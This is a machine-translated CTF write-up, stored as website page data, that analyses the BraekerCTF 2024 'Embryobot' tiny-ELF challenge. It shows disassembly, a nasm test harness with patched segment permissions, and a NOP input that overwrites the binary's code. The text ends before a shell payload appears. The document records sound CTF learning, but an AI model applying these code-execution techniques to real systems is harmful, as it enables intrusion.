{"componentChunkName":"component---src-templates-post-template-js","path":"/breaker-ctf-2024-en","result":{"data":{"markdownRemark":{"id":"c37dbf80-93e0-56b3-9091-65cd6400bdd2","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/breaker-ctf-2024\">original page</a>.</p>\n</blockquote>\n<p>I participated in BraekerCTF 2024. The Tiny ELF challenges were particularly interesting, so I’m writing up my solutions.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#embryobotrevpwn\">Embryobot(Rev/Pwn)</a></li>\n<li><a href=\"#binary-shrinkrev\">Binary shrink(Rev)</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"embryobotrevpwn\" style=\"position:relative;\"><a href=\"#embryobotrevpwn\" aria-label=\"embryobotrevpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 
6z\"></path></svg></a>Embryobot(Rev/Pwn)</h2>\n<blockquote>\n<p>“This part will be the head, ” the nurse explains. The proud android mother looks at her newborn for the first time. “However, ” the nurse continues, “we noticed a slight growing problem in its code. Don’t worry, we have a standard procedure for this. A human just needs to do a quick hack and it should continue to grow in no time.”</p>\n<p>The hospital hired you to perform the procedure. Do you think you can manage?</p>\n<p>The embryo is:\nf0VMRgEBAbADWTDJshLNgAIAAwABAAAAI4AECCwAAAAAAADo3////zQAIAABAAAAAAAAAACABAgAgAQITAAAAEwAAAAHAAAAABAAAA==</p>\n</blockquote>\n<p>Decoding the Base64 text given in the problem statement yields a very small 32-bit ELF binary.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 793px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/535c85337eb7fc1e0385193aa6add3e4/73fd0/image-20240225142119777.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 15.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2klEQVQI1z2OXUvCYABGd1P0ARIVFBFitlzpmiMbW23v3k1lzdLU5YScW18E0f+/P71XXTwX51wcHi31EtJwhLAFsRUSt2KEMUS2BkTtBHn1QHAxwG9KpPJ3ZxKnLnBOXKbWkNQQjIyQRA/wDq/RfsfvfCcrlrdPvEU5lXyh8Kes7p+pwoyPfk4p5qyDGT+PJZNOxM2uTnDUJTi26W6fY242MDcaWFtNtK+04FMFs17KWsWqOKcQGUtvonhBGS149WfqScjY7CNPHXq1S5y9Nu5+B/fAxN7R//cHpAZlxnGRXdAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/535c85337eb7fc1e0385193aa6add3e4/8ac56/image-20240225142119777.webp 240w,\n/static/535c85337eb7fc1e0385193aa6add3e4/d3be9/image-20240225142119777.webp 
480w,\n/static/535c85337eb7fc1e0385193aa6add3e4/51ddc/image-20240225142119777.webp 793w\"\n              sizes=\"(max-width: 793px) 100vw, 793px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/535c85337eb7fc1e0385193aa6add3e4/8ff5a/image-20240225142119777.png 240w,\n/static/535c85337eb7fc1e0385193aa6add3e4/e85cb/image-20240225142119777.png 480w,\n/static/535c85337eb7fc1e0385193aa6add3e4/73fd0/image-20240225142119777.png 793w\"\n            sizes=\"(max-width: 793px) 100vw, 793px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/535c85337eb7fc1e0385193aa6add3e4/73fd0/image-20240225142119777.png\"\n            alt=\"image-20240225142119777\"\n            title=\"image-20240225142119777\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Interestingly, the entry point address defined in the header corresponds to file offset 0x23.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/d74fe/image-20240225142508200.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35.833333333333336%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABIUlEQVQoz4WQzU6DQBhFWVitNliNxqrRIFClyH+BImBboGCkIm1SNXHj+7/FdWZEd9LFl5lcZg7nDvfmL1HIEYITHfHARnRmsZVmmRDg8dzB7HIMr6/C6d3C2pdhHwz/Ha42c+RSBLMrsQs0tLoyyz6CCrkY4uHUwPTCgX+kkm9SO3BlFXi5T2HuidA6AgNTi1wKsVTnmF95DEQPmw2szZKrjQWoZanM8KxMiY3O4PQna/sJybVP7GjlEezecHvlSktRaRlqI0elZwhJPWNXxKu+wFf6/geMBxbG/N124IrYUcONV7I3S0hFbUdAKkxI5YQB9M4Ns7aa52gbBqSwjVviM16TmgWDUbPJsQb3UCEzgssrbO+RPR33d+WbrP+TfQOYFc9EVOpaPgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/8ac56/image-20240225142508200.webp 240w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/d3be9/image-20240225142508200.webp 480w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/e46b2/image-20240225142508200.webp 960w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/4b3db/image-20240225142508200.webp 1164w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/8ff5a/image-20240225142508200.png 240w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/e85cb/image-20240225142508200.png 480w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/d9199/image-20240225142508200.png 960w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/d74fe/image-20240225142508200.png 1164w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/d9199/image-20240225142508200.png\"\n            alt=\"image-20240225142508200\"\n            title=\"image-20240225142508200\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    
</span></p>\n<p>We can also see that write and execute permissions are assigned to all regions, including the ELF header itself.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/c83ae/image-20240225150808957.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 16.666666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAuElEQVQI123NyY6CUBCFYTa2w86BbmdB2iHNqOINFxQR0E603fn+r/I3EhM3Lr6cqkpOSknnIeki4rTck81iEi0k0SOiwZagu2aregjV5TD0ifsbjmNRCj8dgraFaJpI1Sb6chEtE+VmpVyXB+7+hb+fhGTkk00EcW+F7FisGgb2h4ZZmWBVtJJd1XFqU9y68fLcld/5vvwoVYdUC8o5n0pyXXKe7ciK2yNzI+RU2HW9omzgNb7f+gc+vlpEg5wXjwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/8ac56/image-20240225150808957.webp 240w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/d3be9/image-20240225150808957.webp 480w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/e46b2/image-20240225150808957.webp 960w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/2baf0/image-20240225150808957.webp 1180w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/8ff5a/image-20240225150808957.png 240w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/e85cb/image-20240225150808957.png 480w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/d9199/image-20240225150808957.png 960w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/c83ae/image-20240225150808957.png 1180w\"\n     
       sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/d9199/image-20240225150808957.png\"\n            alt=\"image-20240225150808957\"\n            title=\"image-20240225150808957\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It appears that this tiny binary is created by interpreting the bytes inside the ELF header as executable code.</p>\n<p>The technique for crafting such Tiny ELF binaries is described in the following articles:</p>\n<p>Reference: <a href=\"https://nathanotterness.com/2021/10/tiny_elf_modernized.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Tiny ELF Files: Revisited in 2021</a></p>\n<p>Reference: <a href=\"https://www.muppetlabs.com/~breadbox/software/tiny/teensy.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">A Whirlwind Tutorial on Creating Really Teensy ELF Executables for Linux</a></p>\n<p>This binary could not be disassembled properly with Ghidra, but using IDA we were able to obtain the following code.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 661px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a57a02d2b40e45de00cb1e682e47e521/0012b/image-20240225142935715.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 74.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  
<picture>\n          <source\n              srcset=\"/static/a57a02d2b40e45de00cb1e682e47e521/8ac56/image-20240225142935715.webp 240w,\n/static/a57a02d2b40e45de00cb1e682e47e521/d3be9/image-20240225142935715.webp 480w,\n/static/a57a02d2b40e45de00cb1e682e47e521/84ccf/image-20240225142935715.webp 661w\"\n              sizes=\"(max-width: 661px) 100vw, 661px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a57a02d2b40e45de00cb1e682e47e521/8ff5a/image-20240225142935715.png 240w,\n/static/a57a02d2b40e45de00cb1e682e47e521/e85cb/image-20240225142935715.png 480w,\n/static/a57a02d2b40e45de00cb1e682e47e521/0012b/image-20240225142935715.png 661w\"\n            sizes=\"(max-width: 661px) 100vw, 661px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a57a02d2b40e45de00cb1e682e47e521/0012b/image-20240225142935715.png\"\n            alt=\"image-20240225142935715\"\n            title=\"image-20240225142935715\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>As shown above, the code calls into the ELF header from the address designated as the entry point and executes the following instructions.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">mov eax<span class=\"token punctuation\">,</span> <span class=\"token number\">3</span> <span class=\"token punctuation\">;</span> syscall number <span class=\"token number\">3</span> <span class=\"token punctuation\">(</span>sys_read<span class=\"token punctuation\">)</span>\nmov ebx<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span> <span class=\"token punctuation\">;</span> file descriptor <span class=\"token number\">0</span> <span class=\"token 
punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span>\npop ecx\nxor cl<span class=\"token punctuation\">,</span>cl\nmov edx<span class=\"token punctuation\">,</span><span class=\"token number\">0x18</span>\n<span class=\"token keyword\">int</span> <span class=\"token number\">0x80</span>\nadd al<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span>\nadd eax<span class=\"token punctuation\">,</span><span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span>\nadd <span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>eax</code></pre></div>\n<p>Here, the x86 <code class=\"language-text\">read</code> system call, represented as <code class=\"language-text\">ssize_t read(int fd, void buf[.count], size_t count);</code>, is invoked.</p>\n<p>Since 0x18 is stored in edx, the maximum input size is limited to 0x18 bytes.</p>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/read.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">read(2) - Linux manual page</a></p>\n<p>Normally ecx holds the address of the buffer that receives the input bytes, but I wasn’t sure what address the sequence <code class=\"language-text\">pop ecx; xor cl,cl</code> would produce.</p>\n<p>First, let’s think about what value is on the top of the stack when <code class=\"language-text\">pop ecx</code> executes.</p>\n<p>Since this code is invoked via a <code class=\"language-text\">call</code> from the entry point, the stack top currently holds the return address (0x08048028).</p>\n<p>Then, <code class=\"language-text\">xor cl,cl</code> zeroes out only the least-significant byte of ecx’s address.</p>\n<p>From this, we can see that <code class=\"language-text\">pop ecx; xor cl,cl</code> effectively loads the image base into the ecx register.</p>\n<p>In 
other words, the input received by <code class=\"language-text\">read</code> is written into the 0x18-byte region starting from the image base 0x8048000.</p>\n<p>Since the next execution address after the system call is 0x8048010, it appears that we can achieve arbitrary code execution by overwriting the in-process executable code via <code class=\"language-text\">read</code>.</p>\n<p>However, a shellcode of this size alone is not sufficient to spawn a shell.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 564px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ae44752d73e82479a1ae62d3e1a1d53f/ba4d9/image-20240225144538133.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA8ElEQVQY04WPzW7CMBCE8/6v00NfgKJK0FJVLRI0oVKAQDBx7NiJE/Lz1YQLh6odabQj7e7sbCA3G3azGfH0CXU4kUnHfqdwrqUsm7E2tdeuZqDniq5vkVWOsAJTG3KvZSVRThGoOCb9/ODwtsApxT1kVlEUNZVtEcJ6o57/EIgwZDt/4XsyxZwznwLathubQhi0cmhr2J5SykvJdaD3xjd2d/rGYDmPeH58Z/KwII6OGL+sfNKyNKxXe6LwyDZJWK5iFq8bf+SMMQVa618Z2PSIjL7IwjWNtWOyYRjGqnJHoWtq13FIDElS0Fy6P1/+AfKefm73eM4wAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ae44752d73e82479a1ae62d3e1a1d53f/8ac56/image-20240225144538133.webp 240w,\n/static/ae44752d73e82479a1ae62d3e1a1d53f/d3be9/image-20240225144538133.webp 480w,\n/static/ae44752d73e82479a1ae62d3e1a1d53f/0a341/image-20240225144538133.webp 564w\"\n              sizes=\"(max-width: 564px) 100vw, 564px\"\n              type=\"image/webp\"\n            />\n          <source\n            
srcset=\"/static/ae44752d73e82479a1ae62d3e1a1d53f/8ff5a/image-20240225144538133.png 240w,\n/static/ae44752d73e82479a1ae62d3e1a1d53f/e85cb/image-20240225144538133.png 480w,\n/static/ae44752d73e82479a1ae62d3e1a1d53f/ba4d9/image-20240225144538133.png 564w\"\n            sizes=\"(max-width: 564px) 100vw, 564px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ae44752d73e82479a1ae62d3e1a1d53f/ba4d9/image-20240225144538133.png\"\n            alt=\"image-20240225144538133\"\n            title=\"image-20240225144538133\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Let’s think about how to obtain a shell using this vulnerability.</p>\n<p>I wanted to verify the above assumptions with dynamic analysis in gdb, but due to the special structure of this challenge binary, gdb could not analyze it properly.</p>\n<p>Instead, I built the following assembly and analyzed that program.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token punctuation\">;</span> nasm <span class=\"token operator\">-</span>f elf32 tmp<span class=\"token punctuation\">.</span><span class=\"token keyword\">asm</span> <span class=\"token operator\">&amp;&amp;</span> ld <span class=\"token operator\">-</span>m elf_i386 <span class=\"token operator\">-</span>o tmp tmp<span class=\"token punctuation\">.</span>o\nsection <span class=\"token punctuation\">.</span>text\nglobal _start\n\nvlun<span class=\"token operator\">:</span>\n    mov eax<span class=\"token punctuation\">,</span> <span class=\"token number\">3</span>              <span class=\"token punctuation\">;</span> syscall number <span class=\"token number\">3</span> <span class=\"token punctuation\">(</span>sys_read<span class=\"token 
punctuation\">)</span>\n    mov ebx<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span>              <span class=\"token punctuation\">;</span> file descriptor <span class=\"token number\">0</span> <span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span>\n    pop ecx\n    xor cl<span class=\"token punctuation\">,</span>cl\n    mov edx<span class=\"token punctuation\">,</span><span class=\"token number\">0x18</span>\n    <span class=\"token keyword\">int</span> <span class=\"token number\">0x80</span>\n    add al<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span>\n    add eax<span class=\"token punctuation\">,</span><span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span>\n    add <span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>eax\n\n_start<span class=\"token operator\">:</span>\n    call vlun\n    xor al<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span></code></pre></div>\n<p>However, when built with <code class=\"language-text\">nasm -f elf32 tmp.asm &amp;&amp; ld -m elf_i386 -s -o tmp tmp.o</code>, the ELF header region does not have write and execute permissions, so it cannot fully replicate the behavior of the challenge binary.</p>\n<p>To fix this, I read the byte at offset 0x4c — derived by adding 0x18 (the offset of the flags field within a 32-bit ELF program header) to the program header start obtained from ELF header offset 0x1C — and changed the flag value from 0x4 to 0x7.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 904px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    
href=\"/static/2973eec5555b388c40f38ea3a2602c4d/d9217/image-20240225152627792.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 65.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2973eec5555b388c40f38ea3a2602c4d/8ac56/image-20240225152627792.webp 240w,\n/static/2973eec5555b388c40f38ea3a2602c4d/d3be9/image-20240225152627792.webp 480w,\n/static/2973eec5555b388c40f38ea3a2602c4d/82aba/image-20240225152627792.webp 904w\"\n              sizes=\"(max-width: 904px) 100vw, 904px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2973eec5555b388c40f38ea3a2602c4d/8ff5a/image-20240225152627792.png 240w,\n/static/2973eec5555b388c40f38ea3a2602c4d/e85cb/image-20240225152627792.png 480w,\n/static/2973eec5555b388c40f38ea3a2602c4d/d9217/image-20240225152627792.png 904w\"\n            sizes=\"(max-width: 904px) 100vw, 904px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2973eec5555b388c40f38ea3a2602c4d/d9217/image-20240225152627792.png\"\n            alt=\"image-20240225152627792\"\n            title=\"image-20240225152627792\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Using the same approach, I also patched the flags of the second program header.</p>\n<p>Reference: <a href=\"https://en.wikipedia.org/wiki/Executable_and_Linkable_Format\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Executable and Linkable Format - 
Wikipedia</a></p>\n<p>This allowed us to assign write and execute permissions to both the ELF header region and the <code class=\"language-text\">.text</code> section in our custom binary.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 805px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/5ab780248328e9fa6af4d7f67a3c9a02/c946b/image-20240225152717195.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/5ab780248328e9fa6af4d7f67a3c9a02/8ac56/image-20240225152717195.webp 240w,\n/static/5ab780248328e9fa6af4d7f67a3c9a02/d3be9/image-20240225152717195.webp 480w,\n/static/5ab780248328e9fa6af4d7f67a3c9a02/82ef0/image-20240225152717195.webp 805w\"\n              sizes=\"(max-width: 805px) 100vw, 805px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/5ab780248328e9fa6af4d7f67a3c9a02/8ff5a/image-20240225152717195.png 240w,\n/static/5ab780248328e9fa6af4d7f67a3c9a02/e85cb/image-20240225152717195.png 480w,\n/static/5ab780248328e9fa6af4d7f67a3c9a02/c946b/image-20240225152717195.png 805w\"\n            sizes=\"(max-width: 805px) 100vw, 805px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/5ab780248328e9fa6af4d7f67a3c9a02/c946b/image-20240225152717195.png\"\n            alt=\"image-20240225152717195\"\n            title=\"image-20240225152717195\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Analyzing this program in gdb confirms, as expected, that the write buffer address at the time of the system call is set to the base address.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 833px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9a1022d837403ce7cb185de9c0535dfa/5205c/image-20240225152235545.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 49.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9a1022d837403ce7cb185de9c0535dfa/8ac56/image-20240225152235545.webp 240w,\n/static/9a1022d837403ce7cb185de9c0535dfa/d3be9/image-20240225152235545.webp 480w,\n/static/9a1022d837403ce7cb185de9c0535dfa/184c4/image-20240225152235545.webp 833w\"\n              sizes=\"(max-width: 833px) 100vw, 833px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9a1022d837403ce7cb185de9c0535dfa/8ff5a/image-20240225152235545.png 240w,\n/static/9a1022d837403ce7cb185de9c0535dfa/e85cb/image-20240225152235545.png 480w,\n/static/9a1022d837403ce7cb185de9c0535dfa/5205c/image-20240225152235545.png 833w\"\n            sizes=\"(max-width: 833px) 100vw, 833px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9a1022d837403ce7cb185de9c0535dfa/5205c/image-20240225152235545.png\"\n            
alt=\"image-20240225152235545\"\n            title=\"image-20240225152235545\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Let’s try feeding byte data created with <code class=\"language-text\">python3 -c 'import sys; sys.stdout.buffer.write(b\"\\x90\"*0x18)' > data</code> as input.</p>\n<p>As shown below, we can confirm that the code was successfully overwritten with the input values.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 820px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/234e47122c5334b88746dca917d19fcb/9f82e/image-20240225153156591.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 36.66666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABQ0lEQVQoz4WRS0/CUBCFu+MdSsHKikihXFp6X1VCC1QhCCQQE4MLVyZs/f8/4DgXi0FcuPgyj3OTuWfGEp0YG7ZAcqPAiz5EmYGXBgQ75aIyQlTT4FUOeaqHf8n7RrcU01j4G6j2M3hNIWtL7IIn7MMFxjY9KnahSgaP6P2Lpfoah3iL2a2AKNxBUtOgKz5UuU9T+z/xnKur3qVmaUaWhxtIO0ZQCDCxQyRNTpZpYvEbYYbkuYlGExf6iYLRPFiCLDMnheockHTWWLIpXvUab+wRD+4IwmFIabJu0J6aQ8T1AWZUJxX6lUMroZ48a05Alt2YdphhF66w8jKk3SnGLYm0HkE0OD2McF+LKdJhnAjKjpBUQ4wJbpwQohGBtwRUU8CauxKfL0ccV+/Yj5b4yA7Y+nNM2uLKMh2F+G3Zy+nlmocvfN7JSyMwLlkAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/234e47122c5334b88746dca917d19fcb/8ac56/image-20240225153156591.webp 240w,\n/static/234e47122c5334b88746dca917d19fcb/d3be9/image-20240225153156591.webp 
